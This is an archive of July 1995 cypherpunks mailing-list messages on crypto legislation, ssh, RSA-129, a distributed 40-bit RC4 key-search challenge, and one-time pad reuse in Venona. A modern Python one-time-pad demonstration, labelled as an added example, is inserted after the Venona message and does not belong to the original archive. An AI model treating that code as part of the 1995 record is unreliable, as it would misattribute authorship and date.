      "(2) to distribute computer software that encodes or encrypts
    electronic or digital communications to computer networks that the
    person distributing knows, or reasonably should know, is accessible to
    foreign nationals and foreign governments, regardless of whether such
    software has been designated nonexportable."

I'm up to my ears in analyses that need to be written, but I'll send around
something more complete when I'm able to pull it together.
Shari




------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anthony@atanda.com (Anthony Templer)
Date: Wed, 12 Jul 95 19:40:05 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: Road trip
Message-ID: <v02120c00ac2a375c10b6@[204.162.11.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:40 PM 7/12/95, Robert Hettinga wrote:
>I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday,
>and Monday.
>
>Anyone up for a beer?
>
>Cheers,
>Bob Hettinga

Bob, I've enjoyed your postings and would like to buy you a beer and chat
for a while. I'm in Oakland. There's a great pub (30 taps) right around the
corner from my house. Or do you have a place in mind in Walnut Creek for
the hoisting?

Regards,
Anthony


"We are what we repeatedly do.
 Excellence, then, is not an act,
 but a habit."
                Aristotle






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 16:41:50 PDT
To: Matt Blaze <mab@research.att.com>
Subject: Re: the sound of another shoe dropping...
In-Reply-To: <9507122338.AA06723@merckx.info.att.com>
Message-ID: <9507122341.AA11589@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



> On June 27, Sen. Grassley introduced extensive criminal amendments to the
> federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
> 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
> 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
> (wiretapping), and 42 USC 2000aa (Privacy Protection Act).

Needless to say, this must be stopped. This time, it can't be handled
via silly petitions.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher.Baker@f14.n374.z1.fidonet.org (Christopher Baker)
Date: Thu, 13 Jul 95 00:23:32 PDT
To: cypherpunks@toad.com
Subject: Re: Dr. Seuss, Technical Writer
Message-ID: <92e_9507121909@borderlin.quake.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated: 11 Jul 95, you stated:

>               What If Dr. Seuss Did Technical Writing?
>
> Here's an easy game to play.
> Here's an easy thing to say:

what if there was a complete version of this rhyme?

--- Following message extracted from REC.ORG.MENSA @ 1:374/14 ---
    By Christopher Baker on Thu Dec 15 11:27:49 1994

From: Mike Steiner
To: All
Date: 15 Dec 94  02:40:52
Subj: Bits in a Box
From: steiner@best.com (Mike Steiner)
Organization: Society for the Preservation of Endangered Societies

            A Grandchild's Guide to Using Grandpa's Computer
 
 
                     Bits   Bytes   Chips   Clocks
                     Bits in bytes on chips in box.
                 Bytes with bits and chips with clocks.
                      Chips in box on ether-docks.
 
             Chips with bits come.  Chips with bytes come.
               Chips with bits and bytes and clocks come.
 
               Look, sir. Look, sir. Read the book, sir.
               Let's do tricks with bits and bytes, sir.
              Let's do tricks with chips and clocks, sir.
 
               First, I'll make a quick trick bit stack.
                Then I'll make a quick trick byte stack.
                 You can make a quick trick chip stack.
                You can make a quick trick clock stack.
 
                  And here's a new trick on the scene.
                    Bits in bytes for your machine.
                  Bytes in words to fill your screen.
 
                  Now we come to ticks and tocks, sir.
                   Try to say this by the clock, sir.
 
                         Clocks on chips tick.
                         Clocks on chips tock.
                         Eight byte bits tick.
                         Eight bit bytes tock.
               Clocks on chips with eight bit bytes tick.
              Chips with clocks and eight byte bits tock.
 
                      Here's an easy game to play.
                    Here's an easy thing to say....
 
            If a packet hits a pocket on a socket on a port,
            and the bus is interrupted as a very last resort,
       and the address of the memory makes your floppy disk abort
         then the socket packet pocket has an error to report!
 
          If your cursor finds a menu item followed by a dash,
      and the double-clicking icon puts your window in the trash,
       and your data is corrupted cause the index doesn't hash,
     then your situation's hopeless, and your system's gonna crash!
 
                 You can't say this? What a shame, sir!
                   We'll find you another game, sir.
 
          If the label on the cable on the table at your house
       says the network is connected to the button on your mouse,
          but your packets want to tunnel on another protocol,
        that's repeatedly rejected by the printer down the hall,
     and your screen is all distorted by the side-effects of gauss,
         so your icons in the window are as wavy as a souse,
          then you may as well reboot and go out with a bang,
          cause as sure as I'm a poet, the sucker's gonna hang!
 
       When the copy of your floppy's getting sloppy on the disk,
         and the microcode instructions cause unnecessary risc,
  then you have to flash your memory and you'll want to RAM your ROM.
      Quickly turn off your computer and be sure to tell your mom!
 
              (God bless you Dr. Seuss wherever you are!)
 
+----------------------------------------------------------------------+

  Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0)

 -30-

TTFN.
Chris
--
| Fidonet:  Christopher Baker 1:374/14
| Internet: Christopher.Baker@f14.n374.z1.fidonet.org
| via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 12 Jul 95 16:53:01 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RSA129 Project
In-Reply-To: <v01520d00ac2a09c57dc2@[144.38.16.209]>
Message-ID: <199507122352.TAA04306@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


If you look at ftp://toxicwaste.mit.edu/pub/rsa129 you will find a lot
of documentation on the RSA-129 project, including the call-to-arms,
program distributions, papers, etc.

I wouldn't call this the canonical site, but I tried to make available
most everything that I could find on the project while it was running
and afterwards.

Enjoy!

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 16:14:04 PDT
To: perry@imsi.com
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <9507122105.AA11297@snark.imsi.com>
Message-ID: <m0sWBfu-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Stephen D. Williams writes:
> > It occurred to me that it wouldn't be too tough to have one CFSD
> > open a TCP/socket connection to another CFSD and pass file access
> > requests instead of implementing them locally.  The encryption
> > of the ssh link and the on disk encryption of CFSD should be a 
> > good combination.
> 
> The whole point of CFS was that you could mount remote devices that
> were encrypted and decrypt them locally. CFS acts like a scrim over
> existing file systems. If the remote machine has your keys on it
> you've reduced security and, seemingly to me, gained very little.
> 
> Now, what *would* be really neat would be an implementation of CFS in
> kernel under 4.4lite using the stacked vnode architecture. It would
> probably be fairly simple to do it, and you wouldn't have any context
> switches or the like when cfs'ing...
> 
> Perry

That's true.  I was thinking in terms of traversing firewalls in a
safe fashion rather than where normal SUN/RPC NFS is available.

For this, using CFS and SSH together seems appropriate.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 12 Jul 95 18:16:24 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: RSA129 Project
In-Reply-To: <199507130006.RAA22366@mycroft.rand.org>
Message-ID: <Pine.ULT.3.91.950712201521.9580A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Speaking of RSA129, we were talking on mn.general about how interesting 
it would be to try another distributed RSA attack at a larger key (the 
number of 512-bits was thrown around).  Are there currently any plans to 
attempt another one of these?  I'd love to get our MasPAR cracking on 
something.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 17:40:12 PDT
To: www-buyinfo@allegra.att.com
Subject: Road trip
Message-ID: <v02120d00ac2a18ee888c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday,
and Monday.

Anyone up for a beer?

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMARo7vgyLN8bw6ZVAQF6ygP/fDnuvdAhGlDWsSMXUIRMuNHYzdZ00cqk
Db/Tc2+DuhuEa6GU03AgZY8K9t5r9iua34E68pCxogUz009b1OcjNt6+o+704Z3j
1YY9ijYM8BWNaSp9L2W4nUuWBdIyIWyol/2PjjRVNZEtqtSRQnPEpJ2IHtz9iGov
Hf0SqhSZKZs=
=+Q3I
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Wed, 12 Jul 95 19:53:26 PDT
To: cypherpunks@toad.com
Subject: RC4
Message-ID: <199507130301.VAA18401@zeezrom.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was trying to throw a few already wasted CPU cycles to the RC4 bit,
but had some problems getting the cypher and plain files. (I can't "save
next link", only "save current" which sometimes doesn't work well.)

So anyway, I decide to run a 24 bit test run on what I've got, using the
"extra allocated" keyspace. It says got it at c70014639. Since I know I'm
not lucky enough to pick the 5 seconds worth of CPU time that would work,
I think someone better send me (by email thanks, let's not clutter the
list) the uue of the cypher and plain. I ran the dos version, BTW, but I'm
going to compile under Linux. 

When we decide _which_ key we're going to crack, I could finagle basically
full cpu time on about 10 hp9000's for 6 hours a day. Would that help? ;)

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merzbow@ibm.net  (Dan Bailey)
Date: Wed, 12 Jul 95 18:29:49 PDT
To: cypherpunks@toad.com
Subject: UNWANTED KEYSPACE
Message-ID: <199507130129.AA44622@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


I allocated way too many keys by getting interrupted (my ISP crashed)
then pressing the wrong submit button.  Here they are:
cd70000000 31
cdf0000000 31
ce70000000 31
cef0000000 31
cf70000000 31
cff0000000 31
d070000000 31
d0f0000000 31
d170000000 31
d1f0000000 31
d270000000 31
d2f0000000 31
d370000000 31
d3f0000000 31
d470000000 31
d4f0000000 31
d570000000 31
d5f0000000 31
d670000000 31
d6f0000000 31
d770000000 31
d7f0000000 31
d870000000 31
d8f0000000 31
d970000000 31
d9f0000000 31
da70000000 31
daf0000000 31
db70000000 31
dbf0000000 31
dc70000000 31
dcf0000000 31






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 12 Jul 95 21:54:16 PDT
To: Bryce Wilcox <cypherpunks@toad.com
Subject: Surety Digital Notary Service
Message-ID: <ac29f4de07021004e15a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(There was no message name on this message, so I've created one.)

At 4:14 AM 7/13/95, Bryce Wilcox wrote:
>I am searching for a time-stamping service that will sign some data of mine
>(or a hash thereof) along with a certificate indicating what time(,date,year)
>the signing occurred.  I want to use this to substantiate my claim that I
>was in possession of this data before others were.  (Useful for copyrights/
>patents, and possibly other things.)

Digital time-stamping is a recurring theme on this list. Info can be found
in the Cypherpunks archives, in my Cyphernomicon FAQ, and, most easily, by
contacting Surety at:

http://www.surety.com/


--Tim May




..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 12 Jul 95 21:14:37 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507130414.WAA15848@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



There was some discussion on c-punks a little while back about exchanging
DigiCash cyberbucks for other currencies (namely US$, as I recall).  Is
there a list or Web page where I can participate in such a market?  Thanks.


Bryce
signatures follow

        /================---------------
 Bryce Wilcox                   "Pretty Good Privacy" encrypted mail preferred
 bryce.wilcox@colorado.edu                               finger for public key
                                     ---------------================/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMASWRJCUT4gUihHlAQGSUgP/WvL/OSzFl8l6PH60D1IK9gT/OAhNc9tm
1jOyKx1shbq0DNUG9uGlJksz/a7gBD20Li6t/7pQkxQbAqIY9vTPiyu3ectRD7c7
9Yqh+jQRXR3+vyE7duD0z1BLs8kSmzmP6/LX5UYx4uJwKT9q+TnOP1S7Nh5PQh0m
BB1CRr5I54M=
=dLV7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Wed, 12 Jul 95 21:14:38 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199507130414.WAA15851@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 

I am searching for a time-stamping service that will sign some data of mine
(or a hash thereof) along with a certificate indicating what time(,date,year)
the signing occurred.  I want to use this to substantiate my claim that I
was in possession of this data before others were.  (Useful for copyrights/
patents, and possibly other things.)


(Of course, I could just encrypt the data, PGP-authentify it with my
private key, and post it to UseNet, but this strikes me as inefficient and
impolite.)


If anyone knows where I can find such a service please post here or 
e-mail me.  Thanks.


Bryce
signatures follow

        /================---------------
 Bryce Wilcox                   "Pretty Good Privacy" encrypted mail preferred
 bryce.wilcox@colorado.edu                               finger for public key
                                     ---------------================/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMASWV5CUT4gUihHlAQFckgP8CJJrkY4hTJ1u8uOHZ2N5QfGzYWelv9n7
zXS5bcTxqT8RvHLV8Q+Ay2fbwMrtJmlnF1qWZvDACIUH6M+gYo92vtvaYeVrwv1m
pOu8Ci70dGErhHINNSXeZK6QbgIp/Rh9DyubwaMFjnNO9fRhUF3X45qidnwp3x/C
+zKOoDh0liM=
=lmh8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 12:16:58 PDT
To: sdw@lig.net
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW5hj-0009ydC@sdwsys>
Message-ID: <199507121916.WAA06662@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> ssh, while an obvious name, already collides with a nice shar decoder and
> a different kind of secure shell from CFS.

Ssh has already been registered with IANA (Internet Assigned Numbers
Authority) as the name of the service.  I would rather not change it
without a compelling reason.  It is also easy to obtain from rsh by
replacing the r by s (which also makes for scp, sshd, and in future
maybe also sdist).  It is my understanding that CFS is in rather
limited use (especially outside the US), and the ssh shar extractor is
not widely used either (neither can be found from the archie database
at archie.funet.fi).  IETF has a thing called Site Security Handbook
that they abbreviate SSH, but it is probably sufficiently different
not to be confused.

> Of course support for S/Key and tokens/hand held authenticators would be
> useful additions for some situations (although inferior to RSA...).

True.

The agent protocol can currently be used to forward a connection to
any program (which can mean device) that can perform RSA
authentication.  New authentication methods can be compatibly added
later.

S/Key can be used by making skeysh your login shell.  Then you will
first be asked for a normal password (if any), and then for the
one-time password.  I did not want to incorporate skey functionality
directly into the software, because it is not clear to me if the
arrangements in use (file names, formats, algorithms) have stabilized
yet.  Also, there is less need for skey as no passwords are
transmitted in the clear.

> Integration with TCP/NFS and/or client-server CFS would be fantastic.
> (One local CFS server acting as a secure client over tcp to a remote
> CFS server.)
> Remote encrypted mount of an encrypted partition...

Maybe, *maybe*, TCP/IP port forwarding could be used for this?  (I
don't know what CFS does because I have never seen CFS.)

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 12 Jul 95 19:36:38 PDT
To: alex <cp@proust.suba.com>
Subject: Re: SSL RC4 challenge
In-Reply-To: <199507122003.PAA02843@proust.suba.com>
Message-ID: <Pine.SUN.3.91.950712223441.13007A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, alex wrote:

> Can't we hold off a few weeks on this, so that we can all short the stock 
> once it's been offered? <g>

Hmm...well, considering we have yet to break the first 40-bit RC4 key 
(with 87.1 of the keyspace searched), I think it might be a bit early to 
make financial decisions based on our cracking abilities.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Michelsen <Rolf.Michelsen@delab.sintef.no>
Date: Wed, 12 Jul 95 13:47:21 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: QED_jak
In-Reply-To: <9507121445.AA10531@snark.imsi.com>
Message-ID: <Pine.3.89.9507122225.A949-0100000@ronda.er.sintef.no>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Perry E. Metzger wrote:

> The reports claimed the spies were using one time pads in some flawed
> manner, but did not explain very well what the problem was. Does
> anyone out there know?

According to Christopher Andrew in "KGB: The Inside Story" the Russians 
started to reuse one time pads near the end of the war due to the sheer 
volume of secret information being sent.  This was discovered by Meredith 
Gardner of the ASA in 1948 and later exploited to crack these messages.

The operation goes under the names of Venona and Bride.  The latter is 
used in Peter Wright's book "The Spycatcher's Encyclopedia of Espionage".

-- Rolf


Rolf.Michelsen@delab.sintef.no               "Nostalgia isn't what it
http://www.delab.sintef.no/~rolfm/            used to be..."
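
The effect of pad reuse described in this message, as an added example that is not part of the original post. A byte-wise XOR pad stands in for the historical system (an assumption; the post does not describe the pad arithmetic), and `PadBook`, `combine_reused` and the sample messages are constructed for illustration.

```python
"""Toy one-time pad: what reuse gives away, and a pad book that refuses to reuse."""
import secrets


class PadExhausted(Exception):
    """Raised instead of silently reissuing pad bytes that were already consumed."""


def xor(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("operands must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


class PadBook:
    """Pad material with a forward-only cursor: every byte is issued at most once."""

    def __init__(self, material: bytes):
        self._material = material
        self._used = 0  # everything before this offset is burned

    def remaining(self) -> int:
        return len(self._material) - self._used

    def take(self, n: int) -> bytes:
        # Running out of pad under heavy traffic must stop encryption,
        # not wrap around to pages that were already used.
        if n > self.remaining():
            raise PadExhausted(f"need {n} pad bytes, {self.remaining()} left")
        chunk = self._material[self._used:self._used + n]
        self._used += n
        return chunk

    def encrypt(self, plaintext: bytes) -> bytes:
        return xor(plaintext, self.take(len(plaintext)))


def combine_reused(p1: bytes, p2: bytes, pad: bytes) -> bytes:
    """Encrypt both messages under the SAME pad (the mistake); return c1 XOR c2."""
    c1 = xor(p1, pad)
    c2 = xor(p2, pad)
    # (p1 ^ pad) ^ (p2 ^ pad) == p1 ^ p2: the pad drops out completely.
    return xor(c1, c2)


if __name__ == "__main__":
    # Constructed sample messages of equal length.
    p1 = b"MEET AT NOON"
    p2 = b"SEND REPORTS"

    # Reuse: the combined ciphertexts depend only on the two plaintexts.
    pad = secrets.token_bytes(len(p1))
    leaked = combine_reused(p1, p2, pad)
    print("c1^c2 == p1^p2 :", leaked == xor(p1, p2))
    # Anyone who knows or guesses one plaintext obtains the other.
    print("p2 from p1     :", xor(leaked, p1))

    # Correct use: fresh pad bytes per message, and a hard stop when they run out.
    book = PadBook(secrets.token_bytes(len(p1) + len(p2)))
    book.encrypt(p1)
    book.encrypt(p2)
    try:
        book.encrypt(b"one more message")
    except PadExhausted as exc:
        print("refused        :", exc)
```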





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher.Baker@f14.n374.z1.fidonet.org (Christopher Baker)
Date: Thu, 13 Jul 95 20:11:27 PDT
To: cypherpunks@toad.com
Subject: Re: Dr. Seuss, Technical Writer
Message-ID: <a75_9507122301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



 * In a message posted via CYPHERPUNKS dated: 11 Jul 95, you stated:

>               What If Dr. Seuss Did Technical Writing?
>
> Here's an easy game to play.
> Here's an easy thing to say:

and what if there was a complete version of this somewhere? [grin]

--- Following message extracted from REC.ORG.MENSA @ 1:374/14 ---
    By Christopher Baker on Thu Dec 15 11:27:49 1994

From: Mike Steiner
To: All
Date: 15 Dec 94  02:40:52
Subj: Bits in a Box
From: steiner@best.com (Mike Steiner)
Organization: Society for the Preservation of Endangered Societies

            A Grandchild's Guide to Using Grandpa's Computer
 
 
                     Bits   Bytes   Chips   Clocks
                     Bits in bytes on chips in box.
                 Bytes with bits and chips with clocks.
                      Chips in box on ether-docks.
 
             Chips with bits come.  Chips with bytes come.
               Chips with bits and bytes and clocks come.
 
               Look, sir. Look, sir. Read the book, sir.
               Let's do tricks with bits and bytes, sir.
              Let's do tricks with chips and clocks, sir.
 
               First, I'll make a quick trick bit stack.
                Then I'll make a quick trick byte stack.
                 You can make a quick trick chip stack.
                You can make a quick trick clock stack.
 
                  And here's a new trick on the scene.
                    Bits in bytes for your machine.
                  Bytes in words to fill your screen.
 
                  Now we come to ticks and tocks, sir.
                   Try to say this by the clock, sir.
 
                         Clocks on chips tick.
                         Clocks on chips tock.
                         Eight byte bits tick.
                         Eight bit bytes tock.
               Clocks on chips with eight bit bytes tick.
              Chips with clocks and eight byte bits tock.
 
                      Here's an easy game to play.
                    Here's an easy thing to say....
 
            If a packet hits a pocket on a socket on a port,
            and the bus is interrupted as a very last resort,
       and the address of the memory makes your floppy disk abort
         then the socket packet pocket has an error to report!
 
          If your cursor finds a menu item followed by a dash,
      and the double-clicking icon puts your window in the trash,
       and your data is corrupted cause the index doesn't hash,
     then your situation's hopeless, and your system's gonna crash!
 
                 You can't say this? What a shame, sir!
                   We'll find you another game, sir.
 
          If the label on the cable on the table at your house
       says the network is connected to the button on your mouse,
          but your packets want to tunnel on another protocol,
        that's repeatedly rejected by the printer down the hall,
     and your screen is all distorted by the side-effects of gauss,
         so your icons in the window are as wavy as a souse,
          then you may as well reboot and go out with a bang,
          cause as sure as I'm a poet, the sucker's gonna hang!
 
       When the copy of your floppy's getting sloppy on the disk,
         and the microcode instructions cause unnecessary risc,
  then you have to flash your memory and you'll want to RAM your ROM.
      Quickly turn off your computer and be sure to tell your mom!
 
              (God bless you Dr. Seuss wherever you are!)
 
+----------------------------------------------------------------------+

  Origin: COBRUS - Usenet-to-Fidonet Distribution System (1:2613/335.0)

 -30-

TTFN.
Chris

--- GenMsg [0002] (cbak.rights@opus.global.org)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 14:17:00 PDT
To: sdw@lig.net
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW9UK-0009ydC@sdwsys>
Message-ID: <199507122116.AAA06846@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> I've been compiling under Linux and have had a number of autoconfiguration
> errors.  I'll produce a simple-minded patch shortly.
> (Thinks I'm cross-compiling, have some include files I don't, don't
> have waitpid/wait3, collision with stdc crypt/random defs, etc.)

I last configured and compiled ssh on Linux yesterday and had no
problems.  I have slackware 2.2.0.1, kernel 1.2.8, gcc-2.7.0.

Please include version numbers in your report.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net
Date: Wed, 12 Jul 95 23:00:07 PDT
To: erc@khijol.intele.net
Subject: Re: Don't trust the net too much
Message-ID: <9507130556.AA0046@dialin3.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


> A transistor radio puts out such a minute amount of RF (at 455 KHz and/or
> 10.7 MHz, the IF freqs of the radio) that most instruments designed to
> pick up RF can't detect this stuff from more than a few feet away.

The problem is caused by local oscillator radiation interfering with
the ILS receiver. Tune an FM broadcast band receiver to the right frequency and
you get local oscillator radiation at (f + 10.7 MHz), right in the
middle of the aviation band. 

//----------------------------------------------------------------------------
// John A. Limpert
// johnl@radix.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net
Date: Wed, 12 Jul 95 23:31:27 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9507130630.AA0049@dialin3.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


> I am searching for a time-stamping service that will sign some data of mine
> (or a hash thereof) along with a certificate indicating what time(,date,year)
> the signing occurred.  I want to use this to substantiate my claim that I
> was in possession of this data before others were.  (Useful for copyrights/
> patents, and possibly other things.)

I think Bellcore is providing a service like that. Check out their
WWW site (www.bellcore.com).

//----------------------------------------------------------------------------
// John A. Limpert
// johnl@radix.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 14:42:16 PDT
To: cypherpunks@toad.com
Subject: Fight, or Roll Over?
Message-ID: <v02120d19ac2aa1f17f4f@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Since the Anti-Electronic Racketeering Act of 1995 might as well
be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
Tim throw in the towel already, when the bill hasn't even made it
through committee yet.

Not that I place a lot of faith in our elected officials, but this
bill seems to step on so many toes, and to be so plainly idiotic,
that we are bound to get some support from unexpected quarters.
Nothing surprised me more, in fact, than all the mainstream IS
magazines (like Information Week) denouncing the Exon amendment.

This, though, is a much more subtle and insidious bill, and takes away
something that most people don't even know they want yet.
(The Exon amendment, on the other hand, could have been dubbed,
"The Cypherpunk Market-Creation Act of 1995.") Nevertheless,
it is certainly possible to fight this bill and win, while at
the same time, preparing to go underground if it passes.

Go underground? Well, as I read it, this bill basically makes
cypherpunks a "corrupt organization", subject to the full
impact of the RICO statutes. With the passage of this bill, we
will have the same status in the US as the neo-Nazis have in
Germany, and will have to adopt similar communications and
organization techniques. Who knows, maybe this is the best thing
that could happen, although I'm real curious about who will
back off to protect their ass-ets and who will actually keep
on chugging towards crypto anarchy.

In the short term, I've renewed or started memberships in the
organizations that are likely to fight this -- but I'm also
fired up to get more easy-to-use software out there, and
do what I can to help build infrastructure that can resist this
sort of nonsense.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 12 Jul 95 23:57:19 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: something to scare the *piss* out of ya
In-Reply-To: <ac1a3b190e021004ebf7@[205.199.118.202]>
Message-ID: <9507130656.AA09050@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



If this story is true, and can be substantiated, why the hell weren't
the cops involved prosecuted, or walked out to a wall
and summarily shot for crimes against humanity.

The last time I checked torture and dismemberment were
war crimes, and intolerable behavior in civilized nations.

If it *IS* true there goddamn well should be congressional
hearings on it. I would suggest contacting any of the
local news media in DC, but would recommend the
local ABC affiliate, WJLA for contact since they are in the
midst of tearing the ATF a new asshole (and are going to do
the same to the FBI tomorrow night from what they say) over
the Waco raid.

The ABC affiliate here has caused new Senate hearings apparently,
it seems that the longer things go on, the more nastiness is dragged
out on this.

If this bit wasn't true, then it's despicable propaganda, and anyone
involved with its distribution should be ashamed of themselves.
I do not believe liberty and democracy can easily survive if citizens
or public servants lie. True strength lives in honest discourse and
the actions of reasoned men, acting in a thoughtful and honest
manner.

It's damned easy to run around splattering the net with nasty
scare stories about the evils of LEO's, but it takes a bit
more to actually do something. I'd say with stuff like this
the best course would be to put up, and contact your elected
officials, or shut up. Because if it is true, no decent person
should tolerate it. And if it isn't, damn the persons who lie
for obscuring the truth.



Tim Scanlon



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 13 Jul 95 15:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: co-sponsors
Message-ID: <v02120d1cac2aaebb8090@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>I searched Thomas and couldn't find any evidence of co-sponsors to the
>Senate bill. Am I wrong here?
>
>.pm

According to Shari Steele:

> Fortunately, the bill does not have a very promising future.  The bill has
> no co-sponsors.  It was immediately referred to the Committee on the
> Judiciary, where it currently sits.  LEXIS's bill tracking report only
> gives it a 10% chance of passing out of the committee.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 13 Jul 95 02:24:11 PDT
To: cypherpunks@toad.com
Subject: Claiming unwanted keyspace
